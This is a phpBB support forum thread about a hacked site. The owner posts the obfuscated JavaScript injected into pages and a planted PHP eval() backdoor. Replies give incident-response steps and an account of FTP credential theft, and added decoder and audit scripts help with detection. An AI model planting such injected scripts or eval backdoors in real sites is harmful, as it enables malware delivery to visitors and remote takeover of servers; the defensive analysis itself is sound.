Possible hacking?

END OF SUPPORT: 1 January 2017 (announcement)
sitwi
Registered User
Posts: 83
Joined: Fri Jul 21, 2006 10:53 am

Possible hacking?

Post by sitwi »

I'm running 3.0.7, which I'm obviously updating urgently, but I have a worrying problem... the php pages in my root folder are all being tagged with javascript at the end of each page.

Is this a problem with my host's server? With something installed which shouldn't have been? I've added no MODs for ages.

I have the site backed up and it doesn't take one minute to copy over thirty files again. But I obviously need to prevent it, and don't want to put any of my site's visitors at risk.

It's persistent... I've had to repeat the same task 5 or 6 times today.

Any ideas please, anyone?
xiteloft
Registered User
Posts: 25
Joined: Wed Aug 12, 2009 9:46 am

Re: Possible hacking?

Post by xiteloft »

Post the JS code here. And you're 100% sure you haven't edited them? If you're 100% sure, change all of your passwords, especially for cPanel/FTP.
sitwi
Registered User
Posts: 83
Joined: Fri Jul 21, 2006 10:53 am

Re: Possible hacking?

Post by sitwi »

100% positive they have not been edited.

I've amended FTP and database passwords.

Script added (sometimes more than once) is:

Code:

<script type="text/javascript" language="javascript">tjuka="225222222255552225552255255525222555522525525522255225252252222225552522255552252555222225522525225555252252225225552522255225252555522225552522225255552552225525552255255522552252225222555552225222552552525225555252255225522552522225552522225222222555525525552555255252252552252225552522255252222255525222522222225522222555222225555222225552552552522225522525255252252552255525525222255525222255525222522222225522222555222225555222225552552552255225552252255222252552552525522525255222522552555525552252255225222552252525552252225552522252222225525552255255552255525525552552255252252555225525525225255222522552522525525522255252252555252225555225225552522252222225525222255252252552252225522522255225252552555222555255255555252255552222525555255522552555252225555225255255222552252522555552225555222552522525522552255522522552222525525525255225252252222225525225255225222255552522522252255252522555525225522552255252222555252222522252225222222555225525552252255222552255552522522252255252222555252225552522255522222255525222525555225255552555255525522525255522522552252525552555255522252552252522552255225255522552225525525555225255522552225525522255225255552552222525522522225255522552525225552222255225552252225222555552225555222252555525525225255225522555225225522225255255252552252522555552";ihkzr=100;fqfwq=this;uyhbf="i"+"te";kbgqi=116;wnsch="wr"+uyhbf;for(orukv in fqfwq){if(orukv.length==8 && orukv.charCodeAt(0)==ihkzr && orukv.charCodeAt(7)==kbgqi){break;}}o="";rxkv=0;qzhxw=fqfwq[orukv];lhvhk=53;while (rxkv<tjuka.length){knqmr=0;for(xugvd=0;xugvd<8;xugvd++){knqmr=knqmr<<1;if(tjuka.charCodeAt(rxkv+xugvd)==lhvhk){knqmr++;}}rxkv=rxkv+3;qzhxw[wnsch](String.fromCharCode(knqmr));rxkv=rxkv+5;}</script>
Grateful for any help - it's reappearing within hours of me FTPing the old pages back up.
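
The posted script can be read without running it: its loop turns each group of eight characters of the long string into one byte ('5' is a 1 bit, '2' is a 0 bit) and passes each decoded character to document.write. The decoder below is an added example, not part of the original posts; it runs on a constructed sample rather than the posted string, and its function names are hypothetical.

```python
import re

# Constructed sample in the same style as the posted script: every output
# byte is eight characters, where '5' is a 1 bit and '2' is a 0 bit.
SAMPLE_SCRIPT = (
    '<script type="text/javascript">tjuka="'
    + "".join([
        "22555522", "25552222", "22555552",              # <p>
        "25525555", "25525255",                          # ok
        "22555522", "22525555", "25552222", "22555552",  # </p>
    ])
    + '";lhvhk=53;</script>'
)

# A quoted string literal made only of digits, at least two groups long.
BLOB_RE = re.compile(r'"([0-9]{16,})"')


def extract_blob(script_text):
    """Return the first long all-digit string literal, or None."""
    match = BLOB_RE.search(script_text)
    return match.group(1) if match else None


def decode_blob(blob, one_char="5"):
    """Rebuild the text the injected loop would hand to document.write.

    Mirrors the posted loop: read 8 characters, shift left once per
    character, add 1 when the character equals one_char. A short final
    group is padded with zero bits, as reading past the end does in JS.
    """
    out = []
    for i in range(0, len(blob), 8):
        group = blob[i:i + 8].ljust(8, "\0")
        value = 0
        for ch in group:
            value = (value << 1) | (ch == one_char)
        out.append(chr(value))
    return "".join(out)


def decode_script(script_text):
    """Extract and decode the payload of one injected script, or None."""
    blob = extract_blob(script_text)
    return None if blob is None else decode_blob(blob)


if __name__ == "__main__":
    print(repr(decode_script(SAMPLE_SCRIPT)))
```
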
sitwi
Registered User
Posts: 83
Joined: Fri Jul 21, 2006 10:53 am

Re: Possible hacking?

Post by sitwi »

Additionally, in my "docs" folder I have a phpinf.php file, also amended with the last hack and just deleted:

Code:

<?php
if (!isset($_POST['eval'])) {die('fuck chicken');}
eval($_POST['eval']);
?>
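
A read-only audit for the two things reported in this thread, the script appended to pages and the eval backdoor, written as an added example that is not part of the original posts. It assumes a known-good backup copy of the site is available locally; the directory arguments, function names and reason labels are hypothetical.

```python
import re
from pathlib import Path

# Indicators modelled on the two samples posted in this thread.
EVAL_INPUT = re.compile(rb"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b")
DIGIT_BLOB = re.compile(rb"[\"'][0-9]{200,}[\"']")
EXTENSIONS = {".php", ".html", ".htm", ".js"}


def indicators(data):
    """Return the names of the indicators present in one file's bytes."""
    hits = []
    if EVAL_INPUT.search(data):
        hits.append("eval-of-request-input")
    if DIGIT_BLOB.search(data):
        hits.append("long-digit-string")
    low = data.lower()
    # Anything scripted after the last PHP close tag or </html> was
    # appended to the end of the page.
    end = max(low.rfind(b"?>"), low.rfind(b"</html>"))
    if end != -1 and b"<script" in low[end:]:
        hits.append("script-after-end-of-page")
    return hits


def audit(live_root, backup_root):
    """Compare a live web root with a known-good copy without writing.

    Returns {relative_path: [reasons]} for files that are new, differ
    from the backup, or match an indicator.
    """
    live_root, backup_root = Path(live_root), Path(backup_root)
    report = {}
    for path in sorted(live_root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        rel = path.relative_to(live_root)
        data = path.read_bytes()
        reasons = indicators(data)
        good = backup_root / rel
        if not good.is_file():
            reasons.append("not-in-backup")
        elif good.read_bytes() != data:
            reasons.append("differs-from-backup")
        if reasons:
            report[rel.as_posix()] = reasons
    return report
```

Because it only reads files, it can be run against a saved copy of the compromised files without altering them.
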
darcie
Community Team Member
Posts: 5543
Joined: Thu Jul 27, 2006 9:52 am
Location: Davis, California
Name: Darcie Griffin

Re: Possible hacking?

Post by darcie »

Please see: http://www.phpbb.com/community/viewtopi ... 543171#iit
My board has been hacked, what do I do?
Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board; the proper place for incident reports is the tracker.
phpBB on Facebook | Site Rules | Former Community Team leader
Dan East
Registered User
Posts: 35
Joined: Sat Nov 04, 2006 5:15 am

Re: Possible hacking?

Post by Dan East »

Over a year ago I ran into this. I was hit by a pretty complex scheme that involves infecting both servers and client machines. I visited a website which sent me a PDF file, causing Adobe Reader to quickly launch and go away. Just the splash screen came and went is all. Within an hour or so I started getting pop-up ads, etc, on my laptop. It took me a couple days to clean it thoroughly, and I thought I had all that behind me.

About a week later every website that I had FTP credentials to was infected, via FTP download / upload of many PHP and HTML files. The modified code would append javascript to the page, which would in turn serve the exact same PDF that exploited a security hole in Adobe Reader. I assume someone manually parsed passwords from files harvested from my infected laptop, which is why my servers weren't hit until a week later.

My sites have much more PHP than just phpBB, and it was all infected. It wasn't anything specific to phpBB at all, but if that is the only content your site serves then I can see why you might think it is a security hole in phpBB.

Also, a handful of PHP files were not properly infected, which caused errors due to malformed syntax.

The moral of the story is that there are many other attack vectors into your site besides just phpBB.